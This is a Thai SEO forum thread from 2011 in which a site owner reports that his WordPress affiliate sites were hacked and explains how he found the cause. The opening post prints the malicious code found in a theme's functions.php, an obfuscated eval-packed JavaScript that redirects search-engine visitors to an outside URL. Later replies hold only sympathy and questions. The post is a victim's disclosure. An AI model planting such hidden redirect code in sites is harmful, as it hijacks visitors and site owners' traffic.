ยินดีต้อนรับคุณ, บุคคลทั่วไป กรุณา เข้าสู่ระบบ หรือ ลงทะเบียน

เข้าสู่ระบบด้วยชื่อผู้ใช้ รหัสผ่าน และระยะเวลาในเซสชั่น

ThaiSEOBoard.comความรู้ทั่วไปSearch Engine Optimization►► +++ ต้อนรับ Black Friday ด้วยการถูก Hack Wordpress Blog +++ ◄◄
หน้า: 1 2 [ทั้งหมด]   ลงล่าง
พิมพ์
ผู้เขียน หัวข้อ: ►► +++ ต้อนรับ Black Friday ด้วยการถูก Hack Wordpress Blog +++ ◄◄  (อ่าน 3389 ครั้ง)
0 สมาชิก และ 1 บุคคลทั่วไป กำลังดูหัวข้อนี้
ADS2009
Verified Seller
หัวหน้าแก๊งเสียว
*

พลังน้ำใจ: 770
ออฟไลน์ ออฟไลน์

กระทู้: 1,273



ดูรายละเอียด เว็บไซต์
« เมื่อ: 17 พฤศจิกายน 2011, 16:16:02 »

สืบเนื่องจากกระทู้ http://www.thaiseoboard.com/in...995.msg3300813.html#msg3300813
ซึ่งตอนนั้นผมหลงผิดคิดว่าแก้ไขถูกทางแล้ว แต่พอมาเมื่อคืนนี้ เมื่อตรวจสอบดูอีกรอบพบว่า อาการถูก Redirect ยังเป็นอยู่เหมือนเดิม

หลังจากพิจารณาโดยรอบด้าน โดยตั้งข้อสังเกตุดังนี้

1. รายได้จากอเมซอนในรอบประมาณ 1 เดือนที่ผ่านมา ลดลงไปกว่า 50% ใน Account เก่าๆ

2. รายได้จากอเมซอนในรอบประมาณ 1 เดือนที่ผ่านมา เริ่มขยับขึ้นเรื่อยๆ ใน Account ใหม่ๆ ที่พึ่งสมัคร

ตอนแรกนึกว่ามีผลมาจาก 2 สาเหตุคือ

1. เว็บส่วนใหญ่ใน Account เก่าๆ จะเป็นเว็บที่ปั่นด้วย WPMU ซึ่งเนื้อหาไม่มีการ Rewrite ซึ่งอาจถูก Panda เล่นงาน ซึ่งตรงนี้มีส่วนจริง จากบางคีย์เวิร์ดที่ติดตามดู ซึ่งไม่สามารถติดตามได้ทั้งหมด ได้เลื่อนตกค่ำลงเกินกว่าหน้า 10 -20

2. ใกล้เทศกาลลดราคาที่มีหลายระลอกในช่วงท้ายปี คนที่ซื้อคงชลอการซื้อ ซึ่งสังเกตุได้จากสินค้าราคาสูงเริ่มขายได้น้อยลง สินค้าราคาต่ำยังพอขายได้

จาก 2 ประเด็นนี้ทำให้ไม่เอะใจใดๆ จนมาถึงคิว การทำเว็บเพื่อขาย Hostgator ใน ช่วง Black Friday นั้นและครับจึงเป็นที่มาของสาเหตุ ตามกระทู้นี้ครับ
http://www.thaiseoboard.com/in...995.msg3300813.html#msg3300813

สรุปผลการแก้ไข

1.หลังจากย้อนรอยการทำงานเกี่ยวกับเว็บ ขาย Hostgator ซึ่งย้อนดูจากคู่แข่ง 10 อันดับในหน้าแรก ไม่มีใครถูก Redirect เลย มีเพียงเว็บของผมที่อยู่อันดับที่ 2-3 ในผลการค้นหาที่Google .com จึงตัดประเด็นการถูก Hack ที่เว็บนี้ออกไปก่อน
 
2.ข้อสงสัยตามมาคือทำไมเว็บ ขาย Hostgator ตัวนี้พึ่งสร้างได้ 2 วันจึงมีปัญหา เมื่อวิเคราะห็ดู พบว่าผมนำเอา Wordpres Themes จาก อีกเว็บอยู่คนละ Host มาใช้ เนื่องจากเป็น เว็บที่ขาย Hostgator เหมือนกัน แต่ติดตั้งเป็นเว็บปั่น จึงไม่ได้ติดตามดูคีย์เวิร์ดเพราะดูไม่ไหว อต่เว็บใหม่ที่ขาย Hostgator นี้ เป็นเว็บทำมือเน้นคุณภาพเป็นหลัก จึงมีโอกาสได้ติดตามคีย์เวิร์ดเป้าหมาย และเป็นที่มาของจากเจอปัญหา จึงพอที่จะตั้งประเด็นได้ว่า ต้องไปดูที่ Wordpress Themes ตัวนั้นๆ

3. เมื่อเข้าไปดู Wordpress Themes ตัวที่ใช้ กับต้นฉบับที่ดาวน์โหลดมา เอามาเทียบกัน จึงพบโค๊ดที่แปลกปลอมเข้ามา เมื่อดูโค๊ดก็เลยกระจ่างในทันที (เข้าใจซ่อนลิ้งค์ปลายทางไว้ด้วย โค..ร เนียนเลย เ.ร.) และเข้าใจได้ทันทีว่า โดน Hack เข้าแล้ว

4. คราวนี้แก้ไขตัดเอาโค๊ดออก เรียบร้อย ไม่มี Redirect ใดๆ เลย

5. เปิดรายการชื่อโดเมนราวสองร้อยโดเมนที่ใช้งานปัจจุบันอยู่ กระกระจายอยู่หลายๆ Host พบว่า เว็บที่เคยมี Order เรื่อยๆ แล้วหายไปทั้งนั้น และ ถูก Hack ในหลายๆ Host ด้วย

6. เมื่อไล่ดูเว็บที่ถูก Hack พบว่าคน Hack มันเลือกเฉพาะเว็บที่มีคีย์เวิร์ดติดหน้าแรกเท่านั้น เหมือนกับมันสามารถเข้าออกทุก Host ได้ดังใจ มันน่าจะตั้งต้นจากการหาคีย์เวิร์ดเป้าหมายก่อน และดูผลจากเว็บที่ Rank อยู่หน้าแรก จากนั้นก็เลือก Hack เว็บเป้าหมาย

7. วิธีแก้ให้แก้ที่ Wordpress Themes หลักที่ Enable อยู่ มันฝังโค๊ดไว้ที่ไฟล์ functions.php ของ Themes นั้นๆ

แสดงว่าคน Hack เป้าหมายของมันคือ ต้อนรับ Black Friday     


ข้างล่างนี้คือโค๊ดที่มันฝังไว้ครับ

โค๊ด:
<?php 
add_action
(&#39;get_footer&#39;, &#39;add_sscounter&#39;);
function add_sscounter(){
echo &#39;<!--scounter-->&#39;;
if(function_exists(&#39;is_user_logged_in&#39;)){
if(time()%== && !is_user_logged_in()){
echo "<script language="JavaScript">eval(function(p,a,c,k,e,r){e=function(c){return(c<a?&#39;&#39;:e(parseInt(c/a))) ((c=c%a)>35?String.fromCharCode(c 29):c.toString(36))};if(!&#39;&#39;.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return&#39;w &#39;};c=1};while(c--)if(k[c])p=p.replace(new RegExp(&#39;&#39; e(c) &#39;&#39;,&#39;g&#39;),k[c]);return p}(&#39;o r=a.e,t="",q;5(r.4("m.")!=-1)t="q";5(r.4("b.")!=-1)t="q";5(r.4("c.")!=-1)t="p";5(r.4("f.")!=-1)t="q";5(r.4("g.")!=-1)t="h";5(r.4("i.")!=-1)t="q";5(t.6&&((q=r.4("?" t "="))!=-1||(q=r.4("&" t "="))!=-1))j.k="l://9" "1." "n" "3" "." "8" "9.1" "s/" "u.p" "v?w" "d=7&t" "x" "y=" r.z(q 2 t.6).A("&")[0];&#39;,37,37,&#39;||||indexOf|if|length||||document|msn|yahoo||referrer|altavista|aol|query|ask|window|location|http|google|22|var||||12||go|hp|si|er|ms|substring|split&#39;.split(&#39;|&#39;),0,{}))</script>";
}
}
}
?>

บันทึกการเข้า

pacapao
เจ้าพ่อบอร์ดเสียว
*

พลังน้ำใจ: 114
ออฟไลน์ ออฟไลน์

กระทู้: 4,133



ดูรายละเอียด เว็บไซต์
« ตอบ #1 เมื่อ: 17 พฤศจิกายน 2011, 16:19:45 »

theme ใครเอามาแจกเอ่ย
บันทึกการเข้า

แหล่งรวมความรู้พิสดาร และ สาวสวยจากทั่วโลก

สุดยอด นักปั่นบันลือโลก..

ศูนย์จำหน่าย ไตรจีวร และ สังฆภัณฑ์ จำหน่าย กระทะทองเหลือง ช้อนส้อมทองเหลือง แจกัน เชิงเทียน กระถางธูปทองเหลือง ไตรจีวร และ สังฆภัณฑ์ หลายชนิด ชุดผ้าไตร ชุดสรงน้ำ ผ้าอาบน้ำฝน ชุดทำบุญคุณภาพดี-จัดส่งทั่วไทย สังฆภัณฑ์
unseennetwork
Verified Seller
ก๊วนเสียว
*

พลังน้ำใจ: 34
ออฟไลน์ ออฟไลน์

กระทู้: 470



ดูรายละเอียด
« ตอบ #2 เมื่อ: 17 พฤศจิกายน 2011, 16:24:42 »

Hack ที่ theme อย่างเดียวใช่ไหมครับ

บันทึกการเข้า
ADS2009
Verified Seller
หัวหน้าแก๊งเสียว
*

พลังน้ำใจ: 770
ออฟไลน์ ออฟไลน์

กระทู้: 1,273



ดูรายละเอียด เว็บไซต์
« ตอบ #3 เมื่อ: 17 พฤศจิกายน 2011, 17:30:49 »

มัน Hack ที่ Themes หลักที่ใช้ครับ และมัน Hack ได้ทุก Themes ครับ ที่มันต้องการ โค๊ดที่ติดมานี้เป็นโค๊ดที่ถูกฝังจากการ Hack ไม้ได้ถูกฝังมาจากต้นฉบับครับ 
บันทึกการเข้า

yen032
Verified Seller
หัวหน้าแก๊งเสียว
*

พลังน้ำใจ: 254
ออฟไลน์ ออฟไลน์

กระทู้: 2,736



ดูรายละเอียด
« ตอบ #4 เมื่อ: 17 พฤศจิกายน 2011, 17:32:03 »

 wanwan010 wanwan010
บันทึกการเข้า
MILDLOVEz
Newbie
*

พลังน้ำใจ: 12
ออฟไลน์ ออฟไลน์

กระทู้: 87



ดูรายละเอียด เว็บไซต์
« ตอบ #5 เมื่อ: 17 พฤศจิกายน 2011, 17:35:35 »

ดีนะ ผมไม่ใช่แนว SEO  wanwan004
บันทึกการเข้า

คนที่ไม่รู้จักการไว้ใจผู้อื่น ผู้นั้นคือคนที่ไม่เคยได้รับความไว้วางใจจากผู้อื่น ปล.ผมไม่ฉลาดพอเอง ผมชี้แจงไม่เก่ง TT
รายละเอียดเพิ่มเติม โปรดเข้าไปที่ http://thaimadecpa.info/peerfly-course/
Love Family
หัวหน้าแก๊งเสียว
*

พลังน้ำใจ: 152
ออฟไลน์ ออฟไลน์

กระทู้: 1,511



ดูรายละเอียด
« ตอบ #6 เมื่อ: 17 พฤศจิกายน 2011, 17:37:55 »


ผมก็โดนเพิ่งแก้ไป 10 กว่าตัวเอง มันเลวจริงๆ  wanwan010
บันทึกการเข้า

สุขภาพแข็งแรง โชคดีตลอดไป
deksamrong
Verified Seller
หัวหน้าแก๊งเสียว
*

พลังน้ำใจ: 141
ออฟไลน์ ออฟไลน์

กระทู้: 1,708



ดูรายละเอียด เว็บไซต์
« ตอบ #7 เมื่อ: 17 พฤศจิกายน 2011, 17:50:30 »

โดนมาเหมือนกันครับ  wanwan010
บันทึกการเข้า

Xara
ก๊วนเสียว
*

พลังน้ำใจ: 61
ออฟไลน์ ออฟไลน์

กระทู้: 458



ดูรายละเอียด
« ตอบ #8 เมื่อ: 17 พฤศจิกายน 2011, 17:53:23 »

ได้กลับคืนมาแล้วยังครับ  wanwan017
บันทึกการเข้า

รับสร้างเว็บไซด์ ออกแบบแก้ไขธีม สร้างธีมเพื่อการใช้งานด้าน ADS และอื่นๆอีกมากมาย สนใจ PM มาคุยได้ครับ
ADS2009
Verified Seller
หัวหน้าแก๊งเสียว
*

พลังน้ำใจ: 770
ออฟไลน์ ออฟไลน์

กระทู้: 1,273



ดูรายละเอียด เว็บไซต์
« ตอบ #9 เมื่อ: 17 พฤศจิกายน 2011, 22:17:50 »

ได้กลับคืนมาแล้วยังครับ  wanwan017

ได้คืนมาส่วนหนึ่ง เหลืออีก 3 host ที่ยังไม่ได้ใส่ดูครับ แต่ที่ไล่ผ่านมาเจอทุก Host ครับ สงสัยแต่ว่ามันเข้าออก Host ได้แบบเจ้าบ้านเลยนี่ซิ ยังหาที่อุดรูโหว่ไม่เจอครับ
บันทึกการเข้า

asuradech
Verified Seller
สมุนแก๊งเสียว
*

พลังน้ำใจ: 194
ออฟไลน์ ออฟไลน์

กระทู้: 513



ดูรายละเอียด เว็บไซต์
« ตอบ #10 เมื่อ: 17 พฤศจิกายน 2011, 22:21:57 »

อาการที่ท่านเป็นนี่ จะเป็นการ Re-direct ไปหน้าของมันใช่ไหมครับ
บันทึกการเข้า

สอน WordPress
สอนทำ Blog คุณภาพ

Amazon Basic Course สอนตัวต่อตัว เรียน Amazon ตัวต่อตัว
สอน Amazon

เรียนรู้ทักษะการเป็น อาชีพ Internet Marketing
spmazon
Verified Seller
ก๊วนเสียว
*

พลังน้ำใจ: 42
ออฟไลน์ ออฟไลน์

กระทู้: 464



ดูรายละเอียด เว็บไซต์
« ตอบ #11 เมื่อ: 17 พฤศจิกายน 2011, 22:25:32 »

เอแปลกจังมัน Hack มาจากทางไหนหว่า wordpress ไม่น่าจะมีช่องโหว่นะครับ
บันทึกการเข้า

channaron
ก๊วนเสียว
*

พลังน้ำใจ: 47
ออฟไลน์ ออฟไลน์

กระทู้: 316



ดูรายละเอียด
« ตอบ #12 เมื่อ: 17 พฤศจิกายน 2011, 22:29:05 »

งานเข้าอาจารย์แล้ว ( ส่วนลูกศิษย์ทีไม่ตาสีตาสา จะไปรอดไม่ครับอาจารย์  )
บันทึกการเข้า

จะพยายามทำให้ดีที่สุดเท่าที่จะทำได้





Tonkung
หัวหน้าแก๊งเสียว
*

พลังน้ำใจ: 53
ออฟไลน์ ออฟไลน์

กระทู้: 1,448



ดูรายละเอียด
« ตอบ #13 เมื่อ: 17 พฤศจิกายน 2011, 22:36:07 »

เอแปลกจังมัน Hack มาจากทางไหนหว่า wordpress ไม่น่าจะมีช่องโหว่นะครับ

ถ้ามันไม่มีช่องโหว่มันจะออกเวอรืชั่นใหม่มาเรื่อยๆทำไหมล่ะครับ Tongue
บันทึกการเข้า
Horakung
Verified Seller
เจ้าพ่อบอร์ดเสียว
*

พลังน้ำใจ: 163
ออฟไลน์ ออฟไลน์

กระทู้: 3,046



ดูรายละเอียด เว็บไซต์
« ตอบ #14 เมื่อ: 17 พฤศจิกายน 2011, 22:36:59 »

 Shocked ต้องไปเช็คบ้างแล้ว
บันทึกการเข้า

ADS2009
Verified Seller
หัวหน้าแก๊งเสียว
*

พลังน้ำใจ: 770
ออฟไลน์ ออฟไลน์

กระทู้: 1,273



ดูรายละเอียด เว็บไซต์
« ตอบ #15 เมื่อ: 17 พฤศจิกายน 2011, 22:47:47 »

อาการที่ท่านเป็นนี่ จะเป็นการ Re-direct ไปหน้าของมันใช่ไหมครับ
ใช่ครับท่าน มันสุ่มออกไปอยู่ ประมาณ 2 แห่งครับ งานนี้ได้ไล่ล้างเครื่องทั้งหมดที่ใช้ ติดตั้งใหม่หมดเลย เพราะไม่คิดว่าจะเป็นการ Hack ที่ Host เพราะพวกสคริป NULL ท้ังหลายผมไม่ใช้เลย
เลยแน่ใจในส่วนของ Host มากไปครับ 
บันทึกการเข้า

genv441
คนรักเสียว
*

พลังน้ำใจ: 10
ออฟไลน์ ออฟไลน์

กระทู้: 175



ดูรายละเอียด
« ตอบ #16 เมื่อ: 01 มกราคม 2012, 10:19:32 »

งั้นต้องลอง report ไปให้ทาง amazon แบนมันเลยครับ  wanwan010
บันทึกการเข้า
xemmy
หัวหน้าแก๊งเสียว
*

พลังน้ำใจ: 97
ออฟไลน์ ออฟไลน์

กระทู้: 1,214



ดูรายละเอียด
« ตอบ #17 เมื่อ: 01 มกราคม 2012, 11:57:08 »

งั้นต้องลอง report ไปให้ทาง amazon แบนมันเลยครับ  wanwan010

เห็นด้วยอย่างยิ่งเลยค่ะ  wanwan003 wanwan003 wanwan003
บันทึกการเข้า

loidara
ก๊วนเสียว
*

พลังน้ำใจ: 16
ออฟไลน์ ออฟไลน์

กระทู้: 262



ดูรายละเอียด
« ตอบ #18 เมื่อ: 01 มกราคม 2012, 21:27:06 »

ขอบคุณที่เอาเผยแพร่ัครับ ผมเคยโดนมาครั้งนึงละ ไม่รุ้แก้ยังไง ทำไปทำมาโฮสโดนปิดเลย เลยได้ย้ายโฮสใหม่อาการที่ว่าก็หายไปครับ ไม่รู้ว่าเป็นเพราะอะไร ตอนนีเข้าใจกระจ่างแล้วครับ ขอบคุณอืกครั้งครับ  wanwan017
บันทึกการเข้า
kopter
หัวหน้าแก๊งเสียว
*

พลังน้ำใจ: 71
ออฟไลน์ ออฟไลน์

กระทู้: 1,299



ดูรายละเอียด
« ตอบ #19 เมื่อ: 01 มกราคม 2012, 22:36:13 »

น่ากลัวจัง กับพวกหากินอย่างงี้
บันทึกการเข้า
Legolas
Global Moderator
เจ้าพ่อบอร์ดเสียว
*****

พลังน้ำใจ: 889
ออฟไลน์ ออฟไลน์

กระทู้: 10,111



ดูรายละเอียด
« ตอบ #20 เมื่อ: 01 มกราคม 2012, 22:43:58 »

เครียดแทนเลยครับ เพิ่งโดนมาเหมือนกันซักพักแล้วแต่ของผมไม่ใช่ wp  Tongue
บันทึกการเข้า




ตอนนี้มีโปร $29.99 Creative Fabrica ถูกที่สุดสำหรับทำ POD,KDP
ขาย License wp theme 5 ธีมจา่ก Themeforest Newspaper, KALLYAS, Puzzle, Valenti, Jarida ราคาถูกมาก pm มาได้เลยครับ
รับทำ vdo avartar สำหรับนำเสนอ aff ต่างประเท
หน้า: 1 2 [ทั้งหมด]   ขึ้นบน
พิมพ์